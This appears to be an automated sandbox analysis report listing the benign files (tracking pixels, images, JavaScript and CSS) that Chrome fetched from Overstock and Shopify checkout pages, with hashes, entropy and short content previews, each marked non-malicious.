                                                                                                                                                                                    URL:https://14698185.fls.doubleclick.net/activityi;dc_pre=CMerltyZtokDFd2Jgwcd5XoR5w;src=14698185;type=overs0;cat=colle0;ord=3891952609080;npa=0;auiddc=164462539.1730294546;u1=Furniture;ps=1;pcor=2042605777;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=1;gtm=45fe4as0v9189675736z89176705627za201zb9176705627;gcd=13l3l3l3l1l1;dma=0;tag_exp=101533422~101823848~101878899~101878944~101925629;epver=2;~oref=https%3A%2F%2Fwww.overstock.com%2Fwpm%40d9f539ffw0e1474c4pae8b6d69m179c86ad%2Fcustom%2Fweb-pixel-17006751%4084%2Fsandbox%2Fmodern%2Fcollections%2Ffurniture?
                                                                                                                                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CMerltyZtokDFd2Jgwcd5XoR5w;src=14698185;type=overs0;cat=colle0;ord=3891952609080;npa=0;auiddc=*;u1=Furniture;ps=1;pcor=2042605777;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=1;gtm=45fe4as0v9189675736z89176705627za201zb9176705627;gcd=13l3l3l3l1l1;dma=0;tag_exp=101533422~101823848~101878899~101878944~101925629;epver=2;~oref=https%3A%2F%2Fwww.overstock.com%2Fwpm%40d9f539ffw0e1474c4pae8b6d69m179c86ad%2Fcustom%2Fweb-pixel-17006751%4084%2Fsandbox%2Fmodern%2Fcollections%2Ffurniture"/></body></html>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6855
                                                                                                                                                                                    Entropy (8bit):7.747452449308188
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:rGwOk2j2AYWTE1RumhhvvT0yge1Kb+pz/N0FpR+KijrQp:r7uJYFRuk1vXgegypzq7R+Kifc
                                                                                                                                                                                    MD5:C46187AE5FCFC8A93E30E706918A166D
                                                                                                                                                                                    SHA1:49F7C46359C63A47C51AC3F94014F056C7F40D64
                                                                                                                                                                                    SHA-256:FBAB3D441B8FC21F50761D478D291D0528A668ABCD4B50678F281E669F04EEDD
                                                                                                                                                                                    SHA-512:AF37E88BA7E1BAAEFAB9EBDECAAE01BE2A4580DB3F1B819A3B6A26AB62561C0CCC2A1C0B411BA6C72BFB60F58F38F17D59D494C6E1C6DF6D339ED760F476A9C6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/collections/Furniture-of-America-Sylmer-Farmhouse-White-Round-7-piece-Dining-Set.jpg?v=1713206918&width=250
                                                                                                                                                                                    Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@.........................................8iinf..........infe........av01.....infe........Exif.....iprp....ipco....colrrICC....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.............av1C........ispe................pixi............ipma...................iref........cdsc..........mdat.......~Y !..2.....@.A...''--..$......m...D..CA..Cn/..h.J...n...+...OF..y|7.;.im.=..G......D.&...D,........\.j...!...^..z.1(.........7!4....G...zoV.@nQq...|>.CF.0...X..B3..=.N......#4Y Z.b....._...2"xX&.i... Q.......eZ..U.{.....@_n.....9..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (64223), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):64225
                                                                                                                                                                                    Entropy (8bit):5.400240587840965
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:oWNdihmAfqBiu8OGHWca5UGdTMRe5v5W8KKGnsjixgV15pD6N7da6eIUJLIaz:R6sgdXe5v5jDGsjiGV20NL1
                                                                                                                                                                                    MD5:D91BD1A51AF7C9D61F9713512DCD804A
                                                                                                                                                                                    SHA1:08BE0DD5CDF81852077768D225A2964AD4759518
                                                                                                                                                                                    SHA-256:A5CCDB0DE8A7D4BB22391DEBB05E6C98C57DE3B51EA973809EE56ADE2229EB69
                                                                                                                                                                                    SHA-512:6B5D63BFD0DDB19FF0548571D7CC97915F7E4E356B5A64F4045301B0B3B39B69CE0220C1E842EFA530DF5286C9713886FE36A84D800316E5857118AD212E6C94
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/search-nav.ostk-vendor.a5ccdb0de8a7d4bb22391debb05e6c98c57de3b51ea973809ee56ade2229eb69.js
                                                                                                                                                                                    Preview:(window.__LOADABLE_LOADED_CHUNKS__=window.__LOADABLE_LOADED_CHUNKS__||[]).push([[1],{113:function(e,t,r){"use strict";var n,i=(n=r(1))&&"object"==typeof n&&"default"in n?n.default:n,a=r(8),o=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},l=function(e){var t=e.checked,r=e.children,n=e.dataTracking,a=e.id,l=e.inputClassName,s=e.labelClassName,c=e.labelText,u=e.name,f=e.onChange,d=e.type,p=e.value,h=e.wrapperClassName;return i.createElement("div",o({className:("cl-"+d+"-wrapper "+h).trim()},n),i.createElement("input",{checked:t,className:("cl-"+d+"-input "+l).trim(),id:a,name:u,onChange:f,type:d,value:p}),i.createElement("label",o({className:("cl-"+d+"-label "+s+" "+(c?"cl-"+d+"-margin":"")).trim(),htmlFor:a},n),r,c))};l.propTypes={checked:a.bool,children:a.node,id:a.string,inputClassName:a.string,labelClassName:a.string,labelText:a.oneOfType([a.node,a.string]),name:a.string,
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 109
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):133
                                                                                                                                                                                    Entropy (8bit):5.719749850623948
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:FttOPzzoJ73HKnQ2OmYcDBAymRdgee1yqBqACnwyRZGHm4up5XybllRSf9l/n:XtOPzzoJzHKJKcdAykGXsAATD9Jybllw
                                                                                                                                                                                    MD5:769B9E3CF7EACE18A0D4AD8C51E7C4A0
                                                                                                                                                                                    SHA1:58F0DFA32033B943FD81A5A535484D662A249BF3
                                                                                                                                                                                    SHA-256:D822CCD2697B57C783EB5FB588A9A08BA8E0D8609C2C71FC94E47B842FAEE100
                                                                                                                                                                                    SHA-512:1D23F1BF5DDC02B9E251609AD5115A9772B852F1F3E7DE853F119EEB6F6969B17C6B24A542ACFB9BF9AEA67EFFE5605D922E41A816E7B80CD946ABD06477A945
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:................V*.I,)-V.Rrrt..r..u..Q.Q*...M,....&....(x...)............'.....A..rSK2.S...]C..2....K..K...JRS.j..........>qm...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 250x250, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8565
                                                                                                                                                                                    Entropy (8bit):7.7276135160559845
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:NWHIlvAehijZX3Ym9S5kDOvLecTOA7Uk+:NwIlYehi6m9wkDOze7A7Uk+
                                                                                                                                                                                    MD5:DCED4394EC6E28990E2B53601EDA88DB
                                                                                                                                                                                    SHA1:A113D945D7C9AFD59CC8E65FE15E3A61C65B3955
                                                                                                                                                                                    SHA-256:5E277549E48AB307E6346DF0633325913C60D8847AC4066DEA9B9154B6BED008
                                                                                                                                                                                    SHA-512:D35F8667418604F8251F8A553D1B981BEA3398694174CE4880AFA4E0D8BA4943BDE220EBB9519A5047A2450B9A503AFE75E33CC2F35514EE455190E1B2DE3DBB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........................................................................................................................................................................@T(..IJ......8..y.z[.....[%.q".VZj.......`....8w...._.e..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, Unicode text, UTF-8 text, with very long lines (6761)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7168
                                                                                                                                                                                    Entropy (8bit):5.41605270874171
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:jmhihxyeBacaiBynTRihA0pZ7zVZOvAalmLp7UXyJ6k1Pf8GGxexbNU64IG2lA3J:Ie5DYTRnW7BZxp7UXaR98GZJ4JM1t0
                                                                                                                                                                                    MD5:D1586B0EF966A5E187DB76B5C7893CB6
                                                                                                                                                                                    SHA1:EBD4316A4F39A96DDD27797D94376348C71A3F1B
                                                                                                                                                                                    SHA-256:7C044222EE5F647A451DC49E7AEC4AB6B148AF46FF1DA16A2B6A9F8C14C39F94
                                                                                                                                                                                    SHA-512:EEAE1391A0C27E3174FB9F75A6C045620EC662E5EDE304238EDC22A28C91D69299BB51CEEC3539752F2CE93AD4C4DAE84EA33A979AF84F203F43A8D96D596CC2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useAmazonContact.ysZ2sjoF.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-DeliveryMacros._c5_QvIi.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","DeliveryMacro.DJg9JGLP.js","SubscriptionGroupLine.CD4J-c2w.js","SubscriptionPriceBreakdown.CxrCP-xw.js","assets/SubscriptionPriceBreakdown.Bqs0s4oM.css","StackedMerchandisePreview.JyjIicj-.js","assets/StackedMerchandisePreview._xnAOXmq.css"])))=>i.map(i=>d[i]);.import{bH as Me,bI as be,_ as Re,aj as b,e as f,a as e,a7 as ee,a8 as h,ab as R,aB as xe,aO as x,ar as ne,mL as Ae,an as ie,q as _,au as ke,av as Fe,cP as He,cR as te,qN as Ve,m as Be,J as we,dS as Ue,h as Q,at as se,di as qe,aP as ze,cc as X,lE as Ge,cZ as $e,kV as We,y as K,T as Ye,D as je,p as Je,dp as Qe,e_ as Xe,qO as Ke,aT as Ze,dn as en,aV as nn,qP as tn,aU as sn,az as oe,ce as N,aS as on,ae as rn,hf as an,aQ as ln,V as C,ak as dn,jj as cn,d_ as pn,fL as un,jr as hn,cS as yn,c0 as vn}from"./app.DfgMZONA.js";const Cn=Me({displayName:"DeliveryMacros",load:()=>be(()=>Re(()=>import("./co
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (12847)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):12848
                                                                                                                                                                                    Entropy (8bit):5.218715515901815
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:4QHSkTZJ9gaL0t26pBP8dWQPq33gr+WSILVHPBWo:3DZDgaL0pro
                                                                                                                                                                                    MD5:7228D18B2B22DA6298EB9493D1175863
                                                                                                                                                                                    SHA1:FFFBE78B7FE44573640B8DC5EE62FD48828A933B
                                                                                                                                                                                    SHA-256:6D45F0D60087514FE5330FD16E9F4D19E212FF164844D2BF14BB11B3E4441055
                                                                                                                                                                                    SHA-512:28F2383FC6704FFAF9D03F48BC378C698D8AA2488F04E0E36F26002E39400AB4C77AC748E54C8F4E51FF34D8F49678A23E956E99F7A22255D619B11804D39CCC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/DeliveryMethodSelectorSection.DNerkzQV.css
                                                                                                                                                                                    Preview:.rdvNk{animation:_2RkQB .1s .25s linear 6;position:relative;width:24px}[dir=ltr] .rdvNk:after{right:.3rem}[dir=rtl] .rdvNk:after{left:.3rem}.rdvNk:after{content:"";position:absolute;top:-.2rem;height:.7rem;width:.7rem;background-color:var(--x-default-color-text);border:1px solid var(--x-default-color-background);border-radius:50%;animation:i0YRL .4s .85s both}@keyframes i0YRL{0%{opacity:0;transform:scale(.5)}40%{transform:scale(1.1)}to{opacity:1;transform:scale(1)}}@keyframes _2RkQB{0%,to{transform:rotate(10deg)}50%{transform:rotate(-10deg)}}.rMk2p{border-radius:var( --x-express-checkout-button-border-radius, var( --x-primary-button-border-radius, var(--x-global-border-radius, var(--x-border-radius-base)) ) )}.vT2w7{border:1px transparent solid;border-radius:var( --x-express-checkout-button-border-radius, var( --x-primary-button-border-radius, var(--x-global-border-radius, var(--x-border-radius-base)) ) );background-size:100% 60%;background-repeat:no-repeat;background-position:50% 50%}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):234260
                                                                                                                                                                                    Entropy (8bit):5.456621895233652
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:zfLeYH8AtPJ137OeR8NteGvQ+AMPpgArl0xYu58K713FN:zfLeYc+PJxH8N7QQGArHu58K713z
                                                                                                                                                                                    MD5:C04BB3EDB0F1A33B985B3285055FE1FA
                                                                                                                                                                                    SHA1:0AE234EBC67E016B8A3B5603885A67160493227C
                                                                                                                                                                                    SHA-256:668C6828672FA8600B7A0632CB328EE63A31361BE6734987B04985FCD9D08D4F
                                                                                                                                                                                    SHA-512:8E154181A67EF7706AB11421D2A91270F9620895CA54EDA89E73E60533FB2F72CF7E3323F4F56EB08C177F69E4CFC36117E011B3DD2479B07267C7E1F74C8B5D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1957)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2054
                                                                                                                                                                                    Entropy (8bit):5.0844006177477885
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:8hs5TtB3RO/fmHUuMcuIcOFqVsW46i2LYtwOcjxEEsjZihxNR:KABBBO/fmHUuZNt8V3jb0twOWIjZ0T
                                                                                                                                                                                    MD5:D15AD3B82B7105D0CDDF17D1B5802B81
                                                                                                                                                                                    SHA1:04CADFE4AB59B93AD91E32732447DC61923CA9DC
                                                                                                                                                                                    SHA-256:E3DF5A830EC984039F9006C797B66F90AD9C7B733A96C84EBBA778B4FC131696
                                                                                                                                                                                    SHA-512:DB0A969CDEFAA5C269966EA3C9F79461E813964FEDE7EEA777331B4730A9E264AF755AFD7D555114F328EEC6453BF112EA362FA4B32F6E8AF8171F1B7A4B7108
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:function createGtagEvents(elements=[],action="click",name="event_name"){window.gtag||console.error("GA4 events could not be established");for(const el of elements)el?.addEventListener(action,function(e){if(name==="header_nav_click"){const textContent=el.innerText.trim();gtag("event",name,{value:textContent})}else gtag("event",name)})}const selectors=[{selector:"store-header a",eventName:"header_nav_click"},{selector:"#cart-icon",eventName:"mini_cart_toggle"},{selector:'button[name="checkout"]',eventName:"begin_checkout"},{selector:"details-disclosure:has(.product-description)",eventName:"product_description_click"},{selector:"media-gallery img",eventName:"product_image_click"},{selector:"details-disclosure:has(#pr-reviewdisplay)",eventName:"reviews_click"}];for(const s of selectors){const el=document.querySelectorAll(s.selector);createGtagEvents(el,"click",s.eventName)}document.querySelectorAll('form:has(input[type="email"])').forEach(emailInput=>{emailInput.addEventListener("submit",e
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):126260
                                                                                                                                                                                    Entropy (8bit):5.479246130446593
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:RY99WOBK+dyycke5wa0K9K9Ks/uNPIGt4btascq0lY7ajCYGu8yHiIHK3Ilo:RYvWeK+dVj09IKe7yC33So
                                                                                                                                                                                    MD5:CEB6B621E847FFB40A3EDA59F2E19BC5
                                                                                                                                                                                    SHA1:2E5D04EBE65572DF9E3080649CE957A2369D47C3
                                                                                                                                                                                    SHA-256:2CE94B39842C1156A5DDB2A0FEFE140BFC0D7BB646235DEB400321C830036973
                                                                                                                                                                                    SHA-512:DD2A5CC2E29F47C08B86D5CE78B4892D2944658DAC366B9CE97D8B5215E7FD397A8C3CBEEB713C9B5AEE875B2F1704A6943C6A8C2BBC949E04F9240C0CE4FC73
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(()=>{var e={8771:()=>{},3482:function(e,t,n){var r,o,i;!function(s,a){"use strict";o=[n(3550)],void 0===(i="function"==typeof(r=function(e){var t=/(^|@)\S+:\d+/,n=/^\s*at .*(\S+:\d+|\(native\))/m,r=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(n))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(n)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var n=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),r=n.match(/ (\(.+\)$)/);n=r?n.replace(r[0],""):n;var o=t
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (21081), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):21081
                                                                                                                                                                                    Entropy (8bit):5.3370880542408115
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:On9WYgWYRwdEtdgLXp/Pgz/cVeZIlEiIM/cVeZlnIjESnWQWEOjAxOVwdODFpheL:Onoc5ewIeqEV3zFyKwjnxZvV28Dr
                                                                                                                                                                                    MD5:BE464C4118B5C8802DBC44A7A5A3C056
                                                                                                                                                                                    SHA1:3C11F42EA334475BE7C8FFFC51612B80F1AD95AB
                                                                                                                                                                                    SHA-256:4337C5B6FF739BE1D8C6AFA2193AEE802FE9AE694BF97CBF1C40E2EB970E628E
                                                                                                                                                                                    SHA-512:DC01146D09350FE2871ADA0B04747BA60FBDE078769E7CF3AEE10A66D1772853118FB2654534685EE47682C1FC9E71A0F07DC9EE0DDDC586EDB028AB46C32641
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[7],{4857:function(e,t,n){n.r(t);var l=n(8081),i=n.n(l),a=n(3645),o=n.n(a)()(i());o.push([e.id,".cl-alert {\n align-items: center;\n background-color: #e7e8ea;\n border-radius: 4px;\n color: #545658;\n display: flex;\n font-size: 14px;\n justify-content: space-between;\n line-height: 1.5;\n margin-bottom: 8px;\n padding: 14px 16px;\n position: relative;\n}\n.cl-alert a:link,\n.cl-alert a:hover,\n.cl-alert a:active,\n.cl-alert a:visited {\n color: currentColor;\n}\n.cl-alert svg {\n fill: currentColor;\n}\n.cl-alert-close-btn {\n background: none;\n border: none;\n color: currentColor;\n line-height: 1;\n padding: 8px;\n position: absolute;\n right: 4px;\n top: 50%;\n transform: translateY(-50%);\n}\n.cl-alert-close-icon {\n fill: currentColor;\n height: 24px;\n width: 24px;\n}\n.cl-alert-has-close-btn {\n padding-right: 48px;\n}\n.cl-alert-attention.cl-alert-mobile {\n back
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):31
                                                                                                                                                                                    Entropy (8bit):3.8975870361235367
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:OFSABFOQjWWZn:OdzOQWWZn
                                                                                                                                                                                    MD5:D0389F89D0758761D506E9E4ACC61A82
                                                                                                                                                                                    SHA1:249DDAEB2DE09E80DA1C40140B901E3F55152CC9
                                                                                                                                                                                    SHA-256:D199130DDF13EED2D9AF9EB2F1496A4DB5A0BB917B4EDAB179E8846427EB2D01
                                                                                                                                                                                    SHA-512:5522CF7AE5BE1AF664483E269D5949F541D2713DD13E90BB8FFDCFD1D1A8CD4F08FEF9CADF39DCEF1F1F0B6CDC9C1C5F4530689E3393CEAE3495DB3AB3DA2C0F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:Not allowed when Origin missing
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, Unicode text, UTF-8 text, with very long lines (2801)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2806
                                                                                                                                                                                    Entropy (8bit):5.22581878150763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:t489L/ldfiqm/Ziqmr9iM9n67HLB0t05jzchT88l:t489Ldgir6zLB0t05co8l
                                                                                                                                                                                    MD5:79CEA4402CE1DEFE3D2809F6DED524E9
                                                                                                                                                                                    SHA1:7928A398FCF52AA4773CFF22FD0F68A13C534B39
                                                                                                                                                                                    SHA-256:9E4D5AD21F9C7EC58D10AA03CDCA09068B556CF736F876B443ED2FFEB5C7206C
                                                                                                                                                                                    SHA-512:13C63D7B26460725FCC2B4076342DBB9CC7C1D1B935C348AB4B8B22B5303559240F52505BC0805B34B08326A778299365F4227BCC9B63D6B4C15F000ECE42E19
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useShowShopPayOptin.cjqea2Mu.js
                                                                                                                                                                                    Preview:import{c7 as C,A as m,y as I,a as t,e as _,jp as b,ab as h,bP as d,a9 as f,aa as P,bv as x,fb as E,bf as k,o as R,l as L,eU as O,aj as D,at as M,e5 as T,cq as V,em as A,m as F,pM as z,dE as U,qK as j,bi as q}from"./app.DfgMZONA.js";function Y({impressionType:e,impressionFeatures:s}){const r=C(),n=m(null),i=m({impressionType:e,impressionFeatures:s});return i.current={impressionType:e,impressionFeatures:s},I(()=>{if(!window.IntersectionObserver)return;const o=new IntersectionObserver(p=>{const u=p.some(({isIntersecting:c})=>c);a&&u&&(o.unobserve(a),r("impression",{...i.current,timestamp:new Date}))},{threshold:1}),a=n.current;return a&&o.observe(a),()=>{a&&o.unobserve(a)}},[r]),n}function J({impressionType:e,impressionFeatures:s,children:r}){const n=Y({impressionType:e,impressionFeatures:s});return t("div",{ref:n,children:r})}function K(){const e=_();return t(P,{size:"small",appearance:"subdued",children:t(b,{children:e("shop_pay_remember_me.terms_and_privacy_html",{privacy_href:t(h,{chi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):278
                                                                                                                                                                                    Entropy (8bit):4.9143340189187565
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:0eJIvmeqVzXNhpKXaUhMi9L74hRFQqEvcSKg+hs2XmYLIWROU:0upV7NhpKXaUhL9L7obzEvTKg+hs2XmO
                                                                                                                                                                                    MD5:688A714B0E1E48BD1370C7D61D509128
                                                                                                                                                                                    SHA1:CB68181328E224034EC5372E262E326BFBB28B5D
                                                                                                                                                                                    SHA-256:9E416637D6805204B00864F05487ACCBCA42BC0522CA09618A6466E09FF70D10
                                                                                                                                                                                    SHA-512:A5AC054303E4B05F91A04A7258337566D865824EEB0B0C393F1A71BC41AA72733DCBDB13C2A2B3E223B2609CE0EFDA71A5B724951DCAE671FF8485E4EF4B40DF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/useAmazonContact.D-Ox6Dnf.css
                                                                                                                                                                                    Preview:.sqcDF{z-index:200}.z2IIo{display:flex;align-items:center;padding:var(--x-option-list-block-padding) var(--x-option-list-inline-padding)}.qi1py{border-top:0;min-height:5.7rem}.pcf8k{border-top:1px var(--x-default-color-border) var(--option-list-border-style);min-height:7.4rem}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (4605)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4606
                                                                                                                                                                                    Entropy (8bit):5.256379123451953
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:prRQMc0JiSJvHN3x2371xTEbJ38pkXVrcZoybZ55vBqNUc2b26Sq/gh/Rz5Xwy:jQ0/9K32JEkXzqlpwUc2b263Op1Ay
                                                                                                                                                                                    MD5:67419B4A0EA915385C03FAB8ACC19F28
                                                                                                                                                                                    SHA1:A9890CB0B1D39AEC8459B030A4E5D2B60D8AD998
                                                                                                                                                                                    SHA-256:B7B5498F9621E62205C750F4CBC5FC64AF1EFB45CF936C8C3B12496ED45A69DD
                                                                                                                                                                                    SHA-512:C2FB3DA0635033EB310626736A90D024F59B5B88958954E4CD3F0EE77D0620FFC6F78DBA2080D4FCF2A9EF25AD6F92F2AA3E8EC3A46F81BF430736F84CA5357B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/Rollup.B0QeYKuB.js
